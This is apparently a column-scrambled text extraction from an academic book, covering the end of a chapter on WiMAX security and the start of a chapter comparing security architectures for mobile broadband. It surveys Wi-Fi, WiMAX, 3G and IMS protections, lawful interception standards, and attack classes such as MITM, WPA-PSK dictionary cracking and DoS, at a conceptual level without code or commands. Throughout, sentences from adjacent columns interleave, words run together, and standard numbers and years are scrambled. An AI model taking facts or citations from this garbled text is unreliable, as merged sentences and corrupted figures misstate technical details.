alsoverydifficulttohaveaminimumguaranteed 802.11 networks do not authenticate frames and
bandwidth for real-time applications such as VoIP there is no protection against a forgery of the
and videoconferencing. frame source address attack. Here, attackers can
The current Wi-Fi security standard is presented usespoofedframestoredirecttrafficandcorrupt
ini,
1 2.08 whichcontainsmanyfixesforthesecu - address resolution protocol (ARP) tables. Station
rity concerns in 802.11. However 802.11i has not MAC addresses could easily be observed and en-
been widely implemented and distributed among gaged in malicious transmissions. Any user with
end-users and WiMAX is expected to dominate a strong transmitter can be situated in the middle
the market before 802.11i can affect the market. of a new session and potentially steal credentials
Therefore the main security comparisons are and gain access through a man-in-the-middle
between Wi-Fi (802.11a/g) and 802.16. The main (MITM) attack.
reasons for this weakness can be categorized as
follow (Gast, 2004): Problem #6: Traffic Analysis and Eavesdrop-
ping
Problem #1: Easy Access 802.11 is totally vulnerable to passive attacks. There
Since Wi-Fi networks generate beacon frames is no security of the header information, thus, no
containing the network parameters all of the time, protection against eavesdropping. Frame headers
attackers with high gain antennas - can
are find net
always “in the clear” and sender-receiver pairs
works and launch attacks. With the inherent and are vulnerable totrafficanalysis.
add-on security features, WiMAX is expected to
be resilient against such attacks. Problem #7: Higher Level Attacks
Once an attacker gains access (either through
Problem #2: “Rogue” Access Points session-hijacking, MITM, spoofing attacks, or
Anyone can have access to an inexpensive access through breaking the WEP secure key), it is pos-
point (AP) and get connected to a corporate network sible to use that AP to launch attacks on other
and bypass authorization. In WiMAX networks, systems, which are within the trusted domain of
an E2E security scheme can protect APs against the initially attacked AP.
such a scenario.
The main reason for the failure of security in
Problem #3: Unauthorized Use of Service wireless networks is the fact that there are many
Nearly all APs have default configurations with
weaknesses in the mechanisms and protocols used
wired equivalent privacy (WEP) or with a default in the architecture.
key used in WEP by all the vendor’s products.

wIMAx sEcurIty lAyErs to the licensed WiMAX. They do differ, however,

in the amount of transmission power (unlicensed
Transmission control protocol (TCP)/IP protocol WiMAX carriers having a lower maximum power)
stacks have currently dominated the data
which limitstraffic
the range and also the possibility for
transmitted between transmitters and receivers interference.
attached to the backbone of the Internet. The same Some other security implementations at the
situation also applies to WiMAX infrastructures, physical layer exploit the fact that modulation is
therefore it is vital to study the performance and done at this layer. Some transmitters may use fre-
security aspects of WiMAX systems in a simi- quency inversion as a security deterrent (Chandra,
lar layered fashion. In principle, communication 2002). For example, the transmitter may divide
systems are based on the seven-layer OSI model. the spectrum into various frequencies and use the
However, most systems communicating on the different frequencies in a predetermined fashion.
Internet’sbackboneobeythefive-layerarchitecture Obviously, this requires that both the sender and the
and WiMAX security protocol foundation is based receiver share a frequency hopping pattern. This is
on the lower-layers (e.g., the MAC layer), which a form of spread spectrum communication.
provides extra capabilities in constructing security Spread-spectrum systems also have an inher-
functions. ent security mechanism since data meant for a
WiMAX enjoys the inherent security features particular receiver, cannot easily be intercepted by
with an open system platform, the all-IP structure, other receivers if they do not possess the frequency
with options to enhance security in different layers of hoping order which is controlled by the key.
the WiMAX open architecture. All of these features Physical layer security implementations do not
have contributed to the strength of WiMAX security, provide robust protection against attacks as they
which potentially enables secured applications such are prone to attacks such as the disruption of ser-
as VoIP and content streaming. The E2E security vice (denial-of-service [DoS]). Other passive and
scheme also plays a vital role in adding an extra active attacks include cross-connects and adjacent
security feature to enable secure connections for channel interference.
seamless roaming for wireless broadband technolo- Therefore parts of the encryption/decryption
gies across any network supporting TCP/IP. mechanisms (which are mainly controlled at the
This layered approach to security is further MAC layer) that deal with the physical act of hid-
discussed in sections 3.1, 3.2, and 3.3. ing information from the intruders’ eyes are part
of the PHY layer security schemes.
Physical layer security
MAc layer security
IEEE 802.16 is a MAC-layer-based protocol and its
security schemes are mainly situated in the secu- IEEEspecifications
6 1 2. 0 8 forsecuritymainlyfall
rity sublayer of the MAC layer, where most of the within the MAC layer. Figure 1 shows the protocol
algorithms and security mechanisms initially work. layering of 802.16 and the MAC layer’s security
Here, physical (PHY) and MAC layers are closely implementation. The separate security sublayer
related to one another. The basic security functions provides authentication, secure key exchange,
at the physical layer are in the form of key-exchange, and encryption.
encryption, and decryption. These mechanisms are Security within the MAC layer is called the
however controlled at the MAC layer. Therefore the security sublayer. Its goal is to provide access
main objective of this section is to understand the controlandconfidentialityofthedatalink.
MAC layer security mechanisms. When two parties establish a link, they are
Another aspect related to the PHY layer is the protected via a set of protocols that ensure con-
transmission power. Unlicensed WiMAX has the fidentiality and unique access of the authorize
same inherent security capabilities as compared parties. The unique handshaking between the two
0
FigureIEEE 1. lower
802.16 layers(Adaptedfrom to authenticate itself to the BS, which poses
"Part16,"204) a risk for a MITM attack. To overcome this
issue, PKMv2 was proposed (later adopted
by 802.16e), which uses a mutual (two-way)
authentication protocol. Here, both the SS
and the BS are required to authorize and
authenticate each other
• Privacy and key management: The privacy
of the communications between the SS and
the BS is achieved through the PKM proto-
entities; namely BS and subscriber station (SS), is col. Phifer, L 2. (2003, September). Applying
done at the MAC layer through security sublayer, RADIUS to Wireless LANs, using RADIUS
whichhasfiveentitiesChandra, ( : ) 02 For WLAN Authentication, Part I, from
http:www./ wi-fiplanet.com/tutorials/article.
• Security associations: A security asso- php/10724_3114511_1
ciation (SA) is a set of security information • Encryption: The data communication be-
parameters that a BS and one or more of its tween each SS and BS is encrypted using the
client SSs share in order to support secure advanced encryption standard (AES), with at
communications. Three types of SAs are de- least 128 bit keys. According to FIPS 140-2,
finedasJohnston
( Walker,
& )024 primary, AES-128 is computationally secure for data
static, and dynamic(Figurewhich
,) 2 define up to SECRET level for the next 10 years.
the security keys and associations established
between a SS and a BS during the authoriza-
tion phase. According to the initial drafts of WiMAX,
• X.509 certificate profile: This defines a the security sublayer provides enough security
digital certificate to verify the identity mechanisms to provide
of privacy, authentication,
subscribers and prevents impersonation and encryption over the airlink. However, in
(unauthorized SS or BS) order to achieve maximal security strength, true
• PKM authorization: The privacy key man- end-to-end security is required for a corporate
agement (PKM) protocol is responsible for wireless backbone, which enhances the security
privacy, key management, and authorizing an mechanismsspecifiedbytheinitialdrafts.
SS to the BS. The initial draft for WiMAX
mandates the use of PKMv1 (Johnston & security at upper layers
Walker, 2004), which is a one-way authenti-
cation method. PKMv1 requires only the SS IEEE 802.16’s main focus on the security issue
is at the MAC layer, therefore WiMAX has the
Figure2.Securitymodeloftheprivacysublayer(AdaptedfromBarbeau,205)

freedom to adopt the strong security measures for • TS: Lawful

4 32 0 1 Interception (LI); Tele -
upper layers (network, transport, session, and ap- communications Security; Service-specific
plication layers). Upper layer security options, such details for internet access services.
as Internet protocol (IP) security protocol (IPSec) • TS: Lawful3 20 1 interception (LI); Tele -
and transport layer security (TLS), are examples communications Security; Service-specific
of the current security schemes for upper layers. details for e-mail services.
Through this freedom of choice, the security strength • TS: Lawful
2 30 1 Interception (LI); Tele -
of WiMAX is comparable to the most secure net- communicationsSecurity;Handover - Speci
works in the market. ficationforIPDelivery.
• TS: Lawful
1 7 06 1 Interception (LI); Tele -
communications Security; Handover - inter
lawful Interception (lI) or lawful face for the lawful interception of telecom-
legal Interception (llI) (baker, municationstraffic.
foster, & sharp, 2004; brown, 2006; • TS: Lawful
1 301 Interception (LI); Tele -
communications Security; Requirements of
Mulholland, 2006)
Law Enforcement Agencies.
• TR:Lawful
3 52 0 1 Interception(LI);Tele -
Since WiMAX-enabled nodes will be connected
communications Security; Notes on ISDN
as parts of the worldwide telecommunications net-
lawful interception functionality.
works and the telecommunications infrastructure
• TR 10 :94 Lawful Interception ( LI);
of the world, the need for law enforcement access
TelecommunicationsSecurity;IssuesonIP
is required. Standards for access to the IP-based
Interception.
networks such as WiMAX have already been de-
• TR:Lawful
3 41 9 0 Interception(LI);Tele -
veloped and are available from various standards
communicationsSecurity;Concepts - ofInter
and government bodies worldwide.
ception in a Generic Network Architecture.”
What follows is a discussion that focuses on
(copied from Arend, 2007).
two major standards bodies, the ETSI (European
Telecommunications Standards Institute) and the
IETF (Internet Engineering Task Force). IETF Decision on the Lawful
Interception
ETSI Approach to Lawful Interception
The IEFT has yet to consider wiretap require-
The Technical Committee on Lawful Interception ments as part of their standards. The reasons for
(TCLI) is the leading body for lawful interception this decision are:
standardization within ETSI. Lawful interception
standards have also been developed by ETSI techni- • Inappropriate in global standards – legal and
cal bodies: AT, TISPAN (SPAN and TIPHON™), privacy requirements are too varied
TETRA, and by 3GPP™. European governments • Would increase protocol complexity and
might expect WiMAX vendors to provide this law decrease security
enforcement access. Examples of ETSI standards • End-to-end security makes LI unworkable
include: “ • Other standards are already available
• ES
Lawful
1: 7 6 1 02 InterceptionLI)( Telecom-
; The IETF believes that designed mechanisms,
municationsSecurity;HandoverInterface which facilitate
for or enable wiretapping, or methods
the Lawful Interception of Telecommunica- of using other facilities for such purposes, should
tionsTrafficrevised ( version). be described openly, so as to ensure the maximum
• ES: 8Lawful
51 0 2 Interception (LI); Tele - review of the mechanisms and to ensure that they
communicationsSecurity;Requirements adhere asforclosely as possible to their design con-
Network Functions straints. This is considered by Cisco (Figure 3) for

LI in IP networks (RFC 3924) with the following • Undetectable to the subject.

requirements (Mulholland, 2006). • Any available decryption keys should be
Carriers should be able to provide the follow- provided to the authorities.
ing: • Only authorized information should be pro-
vided.
• Content of the communication
° Audio content of the voice call
° Packets to and from the subject sEcurIty of IMs And wIMAx
• Communication-identifying information
(CmII) The IP multimedia subsystem (IMS) uses a
° Dialed digits in voice calls standardized next generation networking (NGN)
° Subject login information architecture for wireline as well as wireless sys-
° Network addresses data tems. This is particularly important for WiMAX
backbones as they offer the required bandwidth
LI should not be detectable by the intercept for such multimedia traffic. More importantly is
subject and should include the followings: the fact that WiMAX comes in several avors, fl
some of which may coexist in a single network:
• Knowledge of wire-tapping is limited to fixed, portable, nomadic, and mobile. Therefore
authorized personnel. WiMAX covers wide areas of broadband access
• Ability to correlate communication identi- for personal and cellular communications, inline
fying information with the content of the with the IMS coverage.
communication. IMS provides new services as well as current
• Confidentiality,authentication, and
and integrity
future Internet related services. This includes
of the CmII. end-users ability to execute all related commands
• Requirements vary between different agen- and functions even when they are far from their
cies, regions, and countries. home networks, roaming through foreign net-
works. In order for IMS to achieve these goals,
Lawful access (LA) requirements are: the architecture of IMS uses the open standard
IP protocols, which is defined by the IETF and
• Invisible to unauthorized personnel and other is enhanced by the 3rd Generation Partnership
interceptors. Project (3GPP). There are three variations of how
Figure3.Lawfulinterceptarchitecturereferencemodel(AdaptedfromMulholland,206)

IMS works: session initiations between two IMS (client/server), as well as in IMS/WiMAX applica-
users, between an IMS user and a user on the tions, including (Ramana Mylavarapu, 2005):
Internet, or between two users on the Internet.
IMS uses similar protocols for such initiations. • Client impersonation (unauthorized client
Furthermore, service developers use IP protocol seeks access)
stack for the interfaces, which is why IMS can • Server impersonation (unauthorized server
truly merge the Internet with the cellular world. pretend to be authorized)
This merge is done by using the cellular and mobile • Message tampering (additions, deletions, or
technologies, which provide ubiquitous access and delay of the message contents)
Internet connections, which provides appealing • Session tampering/hijacking (once the ses-
services. Accordingly, WiMAX enjoys one of the sion between a legitimate client and server
most enhanced cellular technologies, which could is established, an unauthorized entity takes
workinthemostefficientmethoddelivering IMS
the session)
data and applications. • Signaling requests resulting in DoS attacks
In regards to the IMS security requirements,
WiMAX security mechanisms are there to ensure To protect against any of the aforementioned
all communicating parties, which gain access to vulnerabilities, an extensive two-way authentica-
the media, are legitimate and all parties wishing to tion method is used to ensure both the client’s and
gain access are thoroughly authenticated through the server’s right of access and the establishment
the authentication and authorization protocols. This of IPSec security associate with the IMS terminal.
has to be done before any access is permitted. An This prevents the mentioned vulnerabilities as well
ongoing mutual authentication mechanism ensures as snooping attacks and replay attacks and to protect
no illegitimate entity can highjack a session and the privacy of every individual user.
abduct an already authenticated link and take over Security issues in regards to SIP could also be
the communications at any points. summarized as follow (Access security for IP-based
IMSisdesignedtoworkoneitherfixedorservices, mobile2002):
systems. Since WiMAX offers most of the advan-
tagesoffixednetworks,itisexpectedthat • IMSis mechanism of SIP signaling be-
Protection
going to be offered on a pure WiMAX backbone tween the IMS server and the subscriber
to address corporate and end-user requirements. • Subscriber’s self authentication mechanism
The fact that WiMAX is based on an all-IP core • Subscriber’s authentication mechanism to
structure makes it a perfect match for IMS, with its the IMS server
so many IP-based services in use. These services
include voice over IP (VoIP), push to talk over The reactive and proactive security measures
cellular (POC), multiparty games, videoconfer- are the encryption/decryption of SIP messages and
encing, messaging, community services, presence deploying interconnection border control function
information, and content sharing. (IBCF). IBCF is used as a gateway to external
networks and provides network address translation
security of voIP ( NAT)andfirewallfunctions(Mylavarapu,,)052
two-way authentication-authorization schemes,
One of the most important applications of IMS is and secure tunneling.
the VoIP that runs over the standard IP. A VoIP To enhance the deployment of IPSec, it is recom-
system uses protocols, such as, H.323, MGCP, mended to deploy IPv6 (Saito, 2003), which is the
MEGACO, and/or session initiation protocol (SIP) next generation Internet protocol. The important
for signaling, and real time protocol/real time factor of IPv6 is its mandate for utilizing IPSec.
control protocol (RTP/RTCP) for media transport Using a two-way IPSec connection (two one-way
and control. The threats for this type of scenario IPSec patterns) is required for an end-to-end se-
curity scheme (Saito, 2003).

End-to-End APProAcH In wIMAx the AES-counter for cipher-block-chaining

message authentication code (CCM) cipher
As mentioned earlier, the E2E scheme will ensure suite should be used with PKMv2.
that the entire link from the user to the server is
protected. E2E security is a major issue that could PKMv2 authentication/authorization method
be addressed either in a peer-to-peer basis or in a is shown in Figure 4.
multilayer manner. The E2E approach discussed
here will not offer a comprehensive solution to the
multilayer E2E; rather, it will present a peer-to-peer wIMAx vs. 3g tEcHnologIEs
approach (i.e., BS to SS).
The heart of the airlink security scheme in In this section, 3G cellular technologies such as
WiMAX is the privacy key management version global system for mobile communications (GSM),
2 (PKMv2), which offers a mutual authentication universal mobile telecommunications system
method to authenticate both the SS and the BS. (UMTS), and coded division multiple access
The following attacks could be mounted if the (CDMA) are compared with Mobile-WiMAX
PKMv2 is not deployed: (802.16e), as they all fall into the cellular technology
category. Mobile-WiMAX is a good alternative to
• BS and SS impersonations: BS and SS the current 3G technologies.
should be able to authenticate the other
party and find the unauthorized entity.
The use of mutual authentication through Figure 4. The 2-way authentication and authori-
PKMv2 (Figure 4) with suitable credentials. zation of PKMv2 (Adapted from Adibi, Bin, Ho,
PKMv2 supports two authentication protocol Agnew,&Erfani,206)
schemes: Rivest-Shamir-Adleman (RSA) and
extensible authentication protocol (EAP).
EAP is mandatory for all devices.
• Man-in-the-middle-attack: This type of
attack happens when one of the communica-
tion parties is not forced to authenticate itself.
The same as the BS-SS impersonation. The
use of PKMv2 will solve this problem.
• Key exchange issue: To encrypt and decrypt
information between two parties, temporal
keys and sessions keys are used. The key
distribution in the initial draft uses triple data
encryption standard (3DES) for exchang-
ing keys. A 2-key 3DES based-key wrap is
currently used for temporal encryption key
(TEK) exchange. TEKs should not be used
more than one time and there should be a
mechanism to ensure that TEKs do not repeat.
Otherwise this suffers from replay attacks as
there are no dynamic components in the key
exchange protocol and it also suffers from
the man-in-the-middle attacks. To avoid
this problem, various TEKs should be used
and the EAP authentication framework and

security breaches in 3g • Cellular authentication and voice encryp-

technologies tion (CAVE) issue: CDMA uses CAVE,
which is based on 64-bit authentication key
GSM has been around for quite some time and (A-key) and an electronic serial number
the security mandates in GSM were designed (ESN). CAVE and ESN are consider com-
according to the security requirements of when it putationally weak when a brute force attack
was designed. Therefore GSM networks suffered is launched against them
several security issues (i.e., one-sided authentica-
tion mechanisms). As the technology evolved and Mobile-wiMAx (802.16e)
matured, GSM/UMTS and CDMA provided the
market with stronger security options. TheWiMAXspecificationmandatesAES-CCM
Here are short descriptions of the security (Barbeau, 2005) encryption (equivalent to FIPS
problems associated with 3G technologies: 140-2) between customer premises equipments
(CPEs) and the base stations, protecting both the
• Subscriber identity module (SIM) forgery: MAC and the PHY layers. The device key manage-
SIM cards, mostly used in GSM and GPRS mentisbasedonX.09digital 5 certificatespublic
systems, are subject to security threat of key, which uses RSA as the public encryption
forgery due to one-way authorization tech- algorithmandothersecuritymeasures - i.
( e.confi
niques. dentiality) are based on AES.
• Wireless application protocol (WAP) is A true E2E security scheme, which is very hard
insecure: GSM uses WAP for data security, to achieve in 3G technologies, is also available in
which is considered insecure. 802.16e through the use of PKMv2. Therefore Mo-
• Communication signaling in the clear: bile-WiMAX outperforms the strongest members
Most GSM communication signaling is in of the 3G family.
the clear with no protection or encryption.
This makes it prone to a variety of attacks.
• Insecurity of base station: GSM base sta- conclusIon
tions are prone to man-in-the-middle attack
scenarios, due to the one-way nature of the WiMAX has both a sophisticated set of secu-
authentication scheme. rity protocols in its security suite and advanced
• Encryption disability: UMTS systems are bandwidth allocation mechanisms, which makes
susceptible to a downgrade attack, which it a suitable candidate for enterprise applications.
eliminates the encryption. An attacker could The E2E security scheme is capable of providing
disable the encryption and trap a legitimate maximum security for all data and control signals
user in a false base station scenario. between SSs and BSs. This chapter was intended
• International mobile subscriber identity to take a closer look at the E2E security scheme
(IMSI) security issue: Forfirst-timeregis - for WiMAX and to address corporate security
tration of users, the IMSI is sent in clear text requirements. These requirements, which could
and an illegitimate entity could take over the be addressed by WiMAX, are as follows.
session
• Authentication key agreement (AKA) is- Multi-Level Security and Control (“Product
sue: Both UMTS and CDMA use AKA. AKA Overview,” 2006)
is based on a challenge protocol, which is an Corporate servers are usually located in highly
unbalanced technique and AKA relies on the secured data centers. All data frames should be
availability of a tamper-resistant smart-card protected with 128-bit AES encryption technique
in the device, which is also considered to be on an end-to-end basis. Multiple levels of password
breakable and authentication methods can be used. These re-

quirements are supported by the security mandates WIMAX vs. WI-FI

ofWiMAX,specifiedbythecurrentstandards. Fixed- and especially mobile-WiMAX outperform
the security strength in the latest version of the
End-user Remote-Access 802.11 family (802.11i), though 802.16e and 802.11i
End-users are able to connect remotely to a far-away have many features in common.
server location using a secure wireless tunnel and
access multimedia data and transmit private infor- WIMAX and IMs Security
mation. Remote-access is the basic requirement of The security features in WiMAX are mostly
a VPN and through the deployment of WiMAX, a applied at the MAC layer (layer II), where the se-
secureandefficientVPNisachievable. curity sublayer is located. However, WiMAX has
the option to adopt very strong security features
End-User Security Through Encryption (Data implemented at the higher layers (i.e., application
Security) layer) to meet minimum security requirements for
• AES with 128-bit keys protects the data stream IMS applications.
automatically.
• Authentication using dual passwords and Security in Fixed- and Mobile- WIMAX
end-to-end user authentication. Even though security options built into the mo-
• BS and CPE Security: BS, CPE, and other bile-WiMAX are stronger, due to the physical
devices could be protected through ad-on variations and conditions, there has been enough
security features. securitybuiltintobothfixedandmobileWiMAX
to ensure complete security from the end-user and
Device Authentication VPN applications.
• Devices connected to the backbone of an
enterprise will be authenticated, authoriza-
tion, and protected using authentication, rEfErEncEs
authorization, and certification techniques
(i.e., PKMv2, X.509, etc.). Adibi, S., Bin, L., Ho, P. H., Agnew, G. B., & Er-
• There should be a complete logging of au- fani, S. (2006, May). Authentication authorization
thorized and unauthorized devices. This will and accounting (AAA) schemes in WiMAX. Paper
allow tracking of any security violations. presented at the Conference on Electro/Information
Technology, EIT’06.
Secure IMs For Fixed And Mobile Applica-
tions Arend, P. V. D. (2007, March 19). Lawful intercep-
Usingbothfixed-andmobile-WiMAXontheback - tion. Retrieved October 23, 2007, from http://portal.
bone of an enterprise or a corporate server, users etsi.org/li/Summary.asp
will have access to the variety of IMS applications Baker, F., Foster, B., & Sharp, C. (2004, October).
and data, including secure VoIP applications and Cisco architecture for lawful intercept in IP net-
other VPN access techniques. works (RFC 3924). Retrieved October 23, 2007,
from http://www.educause.edu/ir/library/power-
Security at the CPE point/NMD0613B.pps
The security implementations at the customer
premises equipments are required to be very high Barbeau, M. (2005, October 13). WiMax/6 1 2.80
as they are the gateways between the subscriber threataAnalysis. Paper presented at the - Q2SWi
stations and the services provider. net’05. School of Computer Science Carleton
University.

Brown, I. (2006). The Internet standards process. Mylavarapu, R. (2005, August 1). Security consid-
Retrieved October 23, 2007, from http://www. erations for WiMAX-based converged network.
cs.ucl.ac.uk/staff/I.Brown/infosoc-course/inter- RFDESIGN.
netstandards.ppt
Part 16: Air Interface for Fixed Broadband Wireless
Chandra, P. (2002, July 30). Securing WLAN links: AccessSystems,IEEEStd4026 - 1 .208 (http://stan-
Part 3. Telogy networks. Retrieved October 23, dards.ieee.org/getieee802/download/802.16-2004.
2007, from http://www.CommsDesign.com pdf)
Gast, M. (2004). The top seven security problems Product Overview. (2006). Citrix GoToMyPC
of 802.11 wireless (Airmagnet technical white corporate. Retrieved October 23, 2007, from
paper). https://www.gotomypc.com/downloads/pdf/m/
GoToMyPC_Corporate_Product_Overview.pdf
Johnston, D., & Walker, J. (2004). Overview of
IEEE 802.16 security. International Journal. Saito, Y. (2003, December). IPv6 and new security
paradigm. NTT communications.
Mulholland, C. (2006, February 8). Cisco systems
lawful intercept capabilities. TechnicalSpecificationGroupServices - andSys
tem Aspects; G3 Security; Access security for
IP-based services (Release 5). ARIB STD-T63-
33.203, 2002-06

Chapter XLVIII
Evaluation of Security
Architectures for Mobile
Broadband Access
Symeon Chatzinotas
University of Surrey, UK
Jonny Karlsson
Arcada University of Applied Sciences, Finland
Göran Pulkkis
Kaj Grahn
AbstrAct
During the last few years, mobile broadband access has been a popular concept in the context of fourth
generation (4G) cellular systems. After the wide acceptance and deployment of the wired broadband
connections, such as DSL, the research community in conjunction with the industry have tried to de-
velop and deploy viable mobile architectures for broadband connectivity. The dominant architectures
which have already been proposed are Wi-Fi, universal mobile telecommunications system (UMTS),
WiMax,andflash-orthogonalfrequencydivisionmodulation(OFDM)In . thischapter,weanalyzethe
protocols with respect to their security mechanisms. First, a detailed description of the authentication,
confidentiality,andintegritymechanismsisprovidedinordertohighlightthemajors
threats. Subsequently, each threat is evaluated based on three factors: likelihood, impact, and risk.
The technologies are then compared taking their security evaluation into account. Flash-OFDM is not
includedinthiscomparisonsinceitssecurityspecificationshavenotbeenrelease
future trends of mobile broadband access, such as the evolution of WiMax, mobile broadband wireless
access (MBWA), and 4G are discussed.
Evaluation of Security Architectures for Mobile Broadband Access
IntroductIon • Describe and analyze the security architectures

of mobile broadband technologies.
During the last decade, wireless network tech- • Identify the strong and weak points of each
nologies have greatly evolved and have been technology in terms of access control based
able to provide cost-efficient solutionson authentication,
for voice confidentiality, integri
and data services. Their main advantages over and physical layer resilience.
wired networks are that they avoid expensive • Compare the investigated security architec-
cabling infrastructure and they support user turesbasedonariskevaluationoftheidentifi
mobility and effective broadcasting. As a result, security vulnerabilities.
mobile wireless networks have managed to take
over a large percentage of the “voice” market,
since the global system for mobile communica- MobIlE broAdbAnd
tions (GSM) cellular technology has promoted tEcHnologIEs
the worldwide expansion of mobile telephony.
Furthermore, nowadays broadband Internet has This section discusses the mobile technologies
become a necessity for many home and business Wi-Fi,UMTS,WiMax,andash-fl OFDM.Authen -
users. Moreover, in the context of all-IP network ticationperformance,confidentiality,andintegr
convergence, an increasing share of telephony mechanisms for each technology are analyzed.
subscribers is migrating towards VoIP solutions
mainly due to the decreased cost compared to wi-fi
fixedtelephony.Therefore,themainchallengeis
to find spectrum- and cost-efficient solutions Wi-Fi was the for first widely-deployed technology
the provision of mobile broadband services. In this for wireless computer networks. It was originally
direction, a large research community of academic designed to provide portability support in local
and industrial origin has dedicated considerable area networks (LANs). However, Wi-Fi has also
effort on designing, implementing, and deploying been utilized in other scenarios, such as wireless
systems for mobile broadband access, such as Wi- metropolitan area networks (WMANs), since it was
Fi, universal mobile telecommunications system thefirstwirelesstechnologywithsupportformobil
(UMTS)WiMax,
, andash-
fl orthogonalfrequency communication and for a wide range of portable
division modulation (OFDM). According to the and mobile devices.
predictions, in the years to come, more and more of The Wi-Fi radio interface is based on the IEEE
our voice samples and data packets will be carried 802.11 standard and is available in three versions:
over wireless broadband links through the Internet.
Therefore it becomes imperative that these mes- • 802.11a
sages are secured from malicious eavesdroppers ° Frequency: 5.5 GHz,
and attackers. Especially in applications such as ° Modulation: OFDM
e-banking, e-commerce, and e-government the ° Bandwidth: 54 Mbps
revelation of sensitive data to unauthorized persons, • 802.11b
unauthorized data submission, and/or the inter- ° Frequency: 2.4 GHz
ruptionofsystemavailabilitycancausefinancial ° Modulation: Direct sequence spread
damage, user preferences’ surveillance, industry spectrum (DSSS)
espionage, and/or administrative overhead. ° Bandwidth: 11 Mbps
The purpose of this chapter is to analyze and • 802.11g
compare the security architectures of the dominant ° Frequency: 2.4 GHz
mobilebroadbandtechnologies.Morespecifically, ° Modulation: OFDM
the objectives are to: ° Bandwidth: 54 Mbps
0
In this context, Wi-Fi alliance is an organiza- erate totally independently from each other (Baek,
tion testing products in order to evaluate that they Smith, & Kotz, 2004). The authentication process
correctlyimplementthesetofstandards of WPA defined
and WPA2 inadopts the three-entity model
theIEEEspecification.
1 2. 0 8 Aftertheproducts of IEEE 802.1x which was originally designed for
have successfully passed these tests, they are al- the point-to-point protocol (IEEE, 2001). The three
lowed to use the Wi-Fi logo. entities involved in this protocol are the client, the
access point (AP), and the authentication server
security Architecture (AS). First, the client request to obtain access to
the network. The AP acts as a network guard, al-
Wi-Fi security standards include wired equivalent lowing access only to the clients that the AS has
privacy (WEP), Wi-Fi protected access (WPA), and authenticated. Finally, the AS is responsible for
WPA2WEP
. wasthefirstintroducedsecurity - stan
deciding whether the client is allowed to access
dard. WPA was designed to be a security protocol the network. These three entities utilize EAP to
thatcorrectsthesecuritydeficiencies ofWEPcommunication
exchange and messages in order to
to be backward compatible with existing hardware. coordinate the authentication process (Stanley,
The last development in Wi-Fi security is the WPA2 Walker, & Aboba, 2005).
standard which was published in June 2004 by In addition, there is a lighter version of WPA,
the IEEE 802.11i group. WPA2 was designed to called WPA-preshared key (WPA-PSK). This ver-
offer a further improved security scheme (Edney sion is based on a shared secret key or passphrase
& Arbaugh, 2003). The aforementioned security in order to authenticate the wireless clients. As
specifications are analyzed and compared inan
a result, theattacker can use a wireless sniffer to
following paragraphs. capture the 4-way WPA handshake, log the packets,
and then try a brute force attack using a dictionary
Authentication file (Van de Wiele,.)052Thus, if WPA-PSK is
deployed, the robustness of the network security
Authentication services are utilized to allow a cli- totally depends on the length and the complexity
ent to communicate with the serving access point. of the secret key.
After successful authentication, a session is initi-
ated and it can be terminated by either the client Encryption
or the access point. Wi-Fi provides the following
link-layer authentication schemes: Encryptionservicesareutilizedto - provideconfi
dentiality over wireless communication links. In
• Closed system authentication Wi-Fi networks the following encryption schemes
• Mediaaccesscontrol(MAC)filteringare available:
• WEP suthentication—Shared RC4 key
• W PA a nd W PA 2 aut he nt icat ion — • WEP based on the RC4 (Ron’s Code 4) stream
802.1X/extensible authentication protocol cipher
(EAP) • WPA encryption based on the temporal key
integrity protocol (TKIP)
Closedsystemauthentication,MAC • filtering,
WPA2 encryption based on the advanced
and WEP authentication are not recommended due encryption standard (AES)
totheirwell-knownserioussecurityaws fl (Borisov,
Goldberg, & Wagner, 2001; Lynn & Baird, 2002; WEP is a weak implementation of the RC4
Welch & Lathrop, 2003). stream cipher and WEP encryption is thus not
WPA and WPA2 security schemes have some recommended(Borisovetal.;Stubblefield, 1 0, 2
major design differences from WEP, since the Ioannidis, & Rubin, 2002; Welch & Lathrop,
authenticationandtheconfidentiality - 2003).processesop

WPA encryption is based on TKIP. It incor- plaintext in such a way that the checksum remains
porates the basic functionalities of WEP, but im- unchanged. Furthermore, due to the linearity of
provements have been made to address the security both the RC4 stream cipher and the CRC-32 check-
aws.
fl Thelengthoftheinitializationvector (IV)
sum, the attacker is able to change the message
has been increased from 24 bits to 48 bits and even when he does not know the plaintext (Welch
therefore the possibility of reused keys has been & Lathrop, 2003).
significantlydecreased.Furthermore,WPAWPA doeshas incorporated mechanisms for the
not directly utilize the master keys. Instead it con- preventionofreplayattacks.Morespecifically,the
structs a hierarchy of derived keys to be utilized in TKIP sequence counter (TSC) based on the IVs
the encryption process. Finally, WPA dynamically is utilized, so that the receiver can identify and
cycles keys while transferring data. Since keys are reject “replayed” messages. Furthermore, WPA
regularly changed, a malicious user has a very short uses an improved integrity mechanism in order
time window to attempt an attack. to generate the message integrity check (MIC).
WPA2 was designed from scratch taking the This mechanism, called Michael, is able to detect
vulnerabilities of the previous security architec- possible attacks and deploy countermeasures to
tures into account. WPA2 allows various network prevent new attacks.
implementations, but the default configuration WPA2 utilizes CCMP for providing integrity
utilizes the advanced encryption standard (AES) services. CCMP generates a MIC using the CBC-
and the counter mode CBC MAC protocol (CCMP). MAC method. In this method, even the slightest
AES is a block cipher, operating on blocks of 128 change in the plaintext will produce a totally dif-
bit data, and is a replacement of the RC4 algorithm ferent checksum.
used by WPA. AES is much more robust since it
has already been tested in various security archi- security vulnerabilities
tectures without revealing serious vulnerabilities.
CCMP comprises of two main parts. The first is the Wi-Fi security architecture has been
Although
the counter mode (CM) which is responsible for greatly improved since WEP, there are still vul-
the privacy of the data in combination with AES. nerabilities which cannot be addressed by WPA2.
The second is the cipher block chaining message These vulnerabilities can lead to a number of link
authentication code (CBC-MAC) providing data layer denial-of-service (DoS) attacks (Van de
integrity checking and authentication. Wiele, 2005). All the DoS techniques described
here are fairly easy to use with freely available tools
Integrity found on the Internet. In most of the cases, the at-
tacker will use different forged MAC addresses to
Integrity services are responsible for making mount DoS attacks. These attacks can be detected
sure that transmitted information is not replayed by specialized hardware (e.g., air monitor, security
or modified during transmission. The following aware access point) which can detect the misuse of
techniques are applicable in Wi-Fi networks: the infrastructure. Furthermore, this specialized
hardware can notify the people responsible for the
• WEP cyclic redundancy heck 4 (CRC-32) follow-up of a DoS incident and give an estimate
Checksum on where the attacker is located by considering the
• WPA Integrity signal and noise levels.
• WPA2 Integrity
Disassociation Storm
WEP checksum is a noncryptographic linear
function of the plaintext. This means that multiple Before any wireless communication can occur, a
messages may correspond to a single 32-bit number. client has to send an association frame to the ac-
Hence, an experienced intruder could modify the cess point asking to join the network. Similarly,

